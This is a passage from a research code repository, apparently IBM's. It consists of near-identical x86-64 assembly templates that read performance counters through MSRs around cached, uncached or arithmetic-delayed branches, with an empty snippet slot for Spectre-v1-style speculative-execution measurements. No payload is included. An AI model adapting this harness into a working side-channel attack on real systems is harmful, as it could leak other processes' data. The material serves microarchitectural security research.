ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | mov eax, 0 50 | mov r15d, DWORD[warmup_cnt_fake] 51 | mov r14d, 4096 52 | cpuid 53 | lfence 54 | reset_counter 55 | start_counter 56 | xor edx, edx 57 | mov eax, r15d 58 | div r14d 59 | cmp eax, 1 60 | je .else 61 | 62 | ;##### SNIPPET STARTS HERE ###### 63 | 64 | ;##### SNIPPET ENDS HERE ###### 65 | ;lea rax, [lea_array+rax*2] 66 | 67 | .else: 68 | lfence 69 | stop_counter 70 | mov ax, 2 71 | mul DWORD[warmup_cnt_fake] 72 | mov DWORD[warmup_cnt_fake], eax 73 | 74 | inc DWORD[warmup_cnt] 75 | cmp DWORD[warmup_cnt], 13 76 | jl .data 77 | 78 | msr_close 79 | exit 0 80 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_complex_register_mul.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 4096 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | 49 | mov r15d, 4096 50 | .data: 51 | mov eax, 0 52 | cpuid 53 | lfence 54 | reset_counter 55 | start_counter 56 | mov ax, 2 57 | mul r15d 58 | cmp eax, 4 59 | je .else 60 | ;##### SNIPPET STARTS HERE ###### 61 | 62 | ;##### SNIPPET ENDS HERE ###### 63 | ;lea rax, [lea_array+rax*2] 64 | 65 | .else: 66 | lfence 67 | stop_counter 68 | 69 | mov eax, r15d 70 | mov ecx, 2 71 | xor edx, edx 72 | div ecx 73 | mov r15d, eax 74 | 75 | inc DWORD[warmup_cnt] 76 | cmp DWORD[warmup_cnt], 13 77 | jl .data 78 | 79 | msr_close 80 | exit 0 81 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_complex_uncached_div.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | divisor: dw 2 27 | fill3: times 62 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | junk: db 1 35 | ;##### DATA STARTS HERE ######## 36 | 37 | ;##### DATA ENDS HERE ######## 38 | 39 | section .text 40 | global perf_test_entry:function 41 | global snippet:function 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | check_pinning VICTIM_PROCESS 49 | msr_open 50 | msr_seek 51 | .data: 52 | mov eax, 0 53 | mov DWORD[divisor], 4096 54 | mov r15d, DWORD[warmup_cnt_fake] 55 | clflush [divisor] 56 | cpuid 57 | lfence 58 | reset_counter 59 | start_counter 60 | xor edx, edx 61 | mov eax, r15d 62 | div DWORD[divisor] 63 | cmp eax, 1 64 | je .else 65 | 66 | ;##### SNIPPET STARTS HERE ###### 67 | 68 | ;##### SNIPPET ENDS HERE ###### 69 | ;lea rax, [lea_array+rax*2] 70 | 71 | .else: 72 | lfence 73 | stop_counter 74 | mov ax, 2 75 | mul DWORD[warmup_cnt_fake] 76 | mov DWORD[warmup_cnt_fake], eax 77 | 78 | inc DWORD[warmup_cnt] 79 | cmp DWORD[warmup_cnt], 13 80 | jl .data 81 | 82 | msr_close 83 | exit 0 84 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_complex_uncached_mul.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 4096 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | clflush [warmup_cnt_fake] 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | mov ax, 2 56 | mul DWORD[warmup_cnt_fake] 57 | cmp eax, 4 58 | je .else 59 | ;##### SNIPPET STARTS HERE ###### 60 | 61 | ;##### SNIPPET ENDS HERE ###### 62 | ;lea rax, [lea_array+rax*2] 63 | 64 | .else: 65 | lfence 66 | stop_counter 67 | 68 | mov eax, DWORD[warmup_cnt_fake] 69 | mov ecx, 2 70 | xor edx, edx 71 | div ecx 72 | mov DWORD[warmup_cnt_fake], eax 73 | 74 | inc DWORD[warmup_cnt] 75 | cmp DWORD[warmup_cnt], 13 76 | jl .data 77 | 78 | msr_close 79 | exit 0 80 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_register.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | mov r15, 1 49 | .data: 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | cmp r15, 12 56 | je .else 57 | ;##### SNIPPET STARTS HERE ###### 58 | 59 | ;##### SNIPPET ENDS HERE ###### 60 | ;lea rax, [lea_array+rax*2] 61 | 62 | .else: 63 | lfence 64 | stop_counter 65 | 66 | inc r15 67 | cmp r15, 13 68 | jl .data 69 | 70 | msr_close 71 | exit 0 72 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_cond_uncached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | clflush [warmup_cnt] 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | cmp DWORD[warmup_cnt], 12 56 | je .else 57 | ;##### SNIPPET STARTS HERE ###### 58 | 59 | ;##### SNIPPET ENDS HERE ###### 60 | ;lea rax, [lea_array+rax*2] 61 | .else: 62 | lfence 63 | stop_counter 64 | 65 | inc DWORD[warmup_cnt] 66 | cmp DWORD[warmup_cnt], 13 67 | jl .data 68 | 69 | msr_close 70 | exit 0 71 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_cached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | 55 | ;##### SNIPPET STARTS HERE ###### 56 | 57 | ;##### SNIPPET ENDS HERE ###### 58 | ;lea rax, [lea_array+rax*2] 59 | 60 | .else: 61 | lfence 62 | stop_counter 63 | 64 | inc DWORD[warmup_cnt] 65 | cmp DWORD[warmup_cnt], 13 66 | jl .data 67 | 68 | msr_close 69 | exit 0 70 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_complex_cached_div.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | divisor: dw 2 27 | fill3: times 62 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | junk: db 1 35 | ;##### DATA STARTS HERE ######## 36 | 37 | ;##### DATA ENDS HERE ######## 38 | 39 | section .text 40 | global perf_test_entry:function 41 | global snippet:function 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | check_pinning VICTIM_PROCESS 49 | msr_open 50 | msr_seek 51 | .data: 52 | mov eax, 0 53 | mov DWORD[divisor], 4096 54 | mov r15d, DWORD[warmup_cnt_fake] 55 | cpuid 56 | lfence 57 | reset_counter 58 | start_counter 59 | xor edx, edx 60 | mov eax, r15d 61 | ;##### SNIPPET STARTS HERE ###### 62 | 63 | ;##### SNIPPET ENDS HERE ###### 64 | ;lea rax, [lea_array+rax*2] 65 | 66 | .else: 67 | lfence 68 | stop_counter 69 | mov ax, 2 70 | mul DWORD[warmup_cnt_fake] 71 | mov DWORD[warmup_cnt_fake], eax 72 | 73 | inc DWORD[warmup_cnt] 74 | cmp DWORD[warmup_cnt], 13 75 | jl .data 76 | 77 | msr_close 78 | exit 0 79 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_complex_cached_mul.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 4096 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | mov ax, 2 55 | ;##### SNIPPET STARTS HERE ###### 56 | 57 | ;##### SNIPPET ENDS HERE ###### 58 | ;lea rax, [lea_array+rax*2] 59 | 60 | .else: 61 | lfence 62 | stop_counter 63 | 64 | mov eax, DWORD[warmup_cnt_fake] 65 | mov ecx, 2 66 | xor edx, edx 67 | div ecx 68 | mov DWORD[warmup_cnt_fake], eax 69 | 70 | inc DWORD[warmup_cnt] 71 | cmp DWORD[warmup_cnt], 13 72 | jl .data 73 | 74 | msr_close 75 | exit 0 76 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_complex_register_div.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dq 2 24 | fill2: times 60 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | mov eax, 0 50 | mov r15d, DWORD[warmup_cnt_fake] 51 | mov r14d, 4096 52 | cpuid 53 | lfence 54 | reset_counter 55 | start_counter 56 | xor edx, edx 57 | mov eax, r15d 58 | 59 | ;##### SNIPPET STARTS HERE ###### 60 | 61 | ;##### SNIPPET ENDS HERE ###### 62 | ;lea rax, [lea_array+rax*2] 63 | 64 | .else: 65 | lfence 66 | stop_counter 67 | mov ax, 2 68 | mul DWORD[warmup_cnt_fake] 69 | mov DWORD[warmup_cnt_fake], eax 70 | 71 | inc DWORD[warmup_cnt] 72 | cmp DWORD[warmup_cnt], 13 73 | jl .data 74 | 75 | msr_close 76 | exit 0 77 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_complex_register_mul.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 4096 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | 49 | mov r15d, 4096 50 | .data: 51 | mov eax, 0 52 | cpuid 53 | lfence 54 | reset_counter 55 | start_counter 56 | mov ax, 2 57 | ;##### SNIPPET STARTS HERE ###### 58 | 59 | ;##### SNIPPET ENDS HERE ###### 60 | ;lea rax, [lea_array+rax*2] 61 | 62 | .else: 63 | lfence 64 | stop_counter 65 | 66 | mov eax, r15d 67 | mov ecx, 2 68 | xor edx, edx 69 | div ecx 70 | mov r15d, eax 71 | 72 | inc DWORD[warmup_cnt] 73 | cmp DWORD[warmup_cnt], 13 74 | jl .data 75 | 76 | msr_close 77 | exit 0 78 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_complex_uncached_div.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | divisor: dw 2 27 | fill3: times 62 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | junk: db 1 35 | ;##### DATA STARTS HERE ######## 36 | 37 | ;##### DATA ENDS HERE ######## 38 | 39 | section .text 40 | global perf_test_entry:function 41 | global snippet:function 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | check_pinning VICTIM_PROCESS 49 | msr_open 50 | msr_seek 51 | .data: 52 | mov eax, 0 53 | mov DWORD[divisor], 4096 54 | mov r15d, DWORD[warmup_cnt_fake] 55 | clflush [divisor] 56 | cpuid 57 | lfence 58 | reset_counter 59 | start_counter 60 | xor edx, edx 61 | mov eax, r15d 62 | 63 | ;##### SNIPPET STARTS HERE ###### 64 | 65 | ;##### SNIPPET ENDS HERE ###### 66 | ;lea rax, [lea_array+rax*2] 67 | 68 | .else: 69 | lfence 70 | stop_counter 71 | mov ax, 2 72 | mul DWORD[warmup_cnt_fake] 73 | mov DWORD[warmup_cnt_fake], eax 74 | 75 | inc DWORD[warmup_cnt] 76 | cmp DWORD[warmup_cnt], 13 77 | jl .data 78 | 79 | msr_close 80 | exit 0 81 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_complex_uncached_mul.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 4096 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | clflush [warmup_cnt_fake] 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | mov ax, 2 56 | ;##### SNIPPET STARTS HERE ###### 57 | 58 | ;##### SNIPPET ENDS HERE ###### 59 | ;lea rax, [lea_array+rax*2] 60 | 61 | .else: 62 | lfence 63 | stop_counter 64 | 65 | mov eax, DWORD[warmup_cnt_fake] 66 | mov ecx, 2 67 | xor edx, edx 68 | div ecx 69 | mov DWORD[warmup_cnt_fake], eax 70 | 71 | inc DWORD[warmup_cnt] 72 | cmp DWORD[warmup_cnt], 13 73 | jl .data 74 | 75 | msr_close 76 | exit 0 77 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_register.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | mov r15, 1 49 | .data: 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | ;##### SNIPPET STARTS HERE ###### 56 | 57 | ;##### SNIPPET ENDS HERE ###### 58 | ;lea rax, [lea_array+rax*2] 59 | 60 | .else: 61 | lfence 62 | stop_counter 63 | 64 | inc r15 65 | cmp r15, 13 66 | jl .data 67 | 68 | msr_close 69 | exit 0 70 | -------------------------------------------------------------------------------- /examples/v1_various_cond_cycles/v1_nocond_uncached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | val: dq 0 29 | len: equ $-val 30 | lea_array: times 40 db 0 31 | junk: db 1 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | 40 | perf_test_entry: 41 | push rbp 42 | mov rbp, rsp 43 | sub rsp, len 44 | 45 | check_pinning VICTIM_PROCESS 46 | msr_open 47 | msr_seek 48 | .data: 49 | clflush [warmup_cnt] 50 | mov eax, 0 51 | cpuid 52 | lfence 53 | reset_counter 54 | start_counter 55 | ;##### SNIPPET STARTS HERE ###### 56 | 57 | ;##### SNIPPET ENDS HERE ###### 58 | ;lea rax, [lea_array+rax*2] 59 | .else: 60 | lfence 61 | stop_counter 62 | 63 | 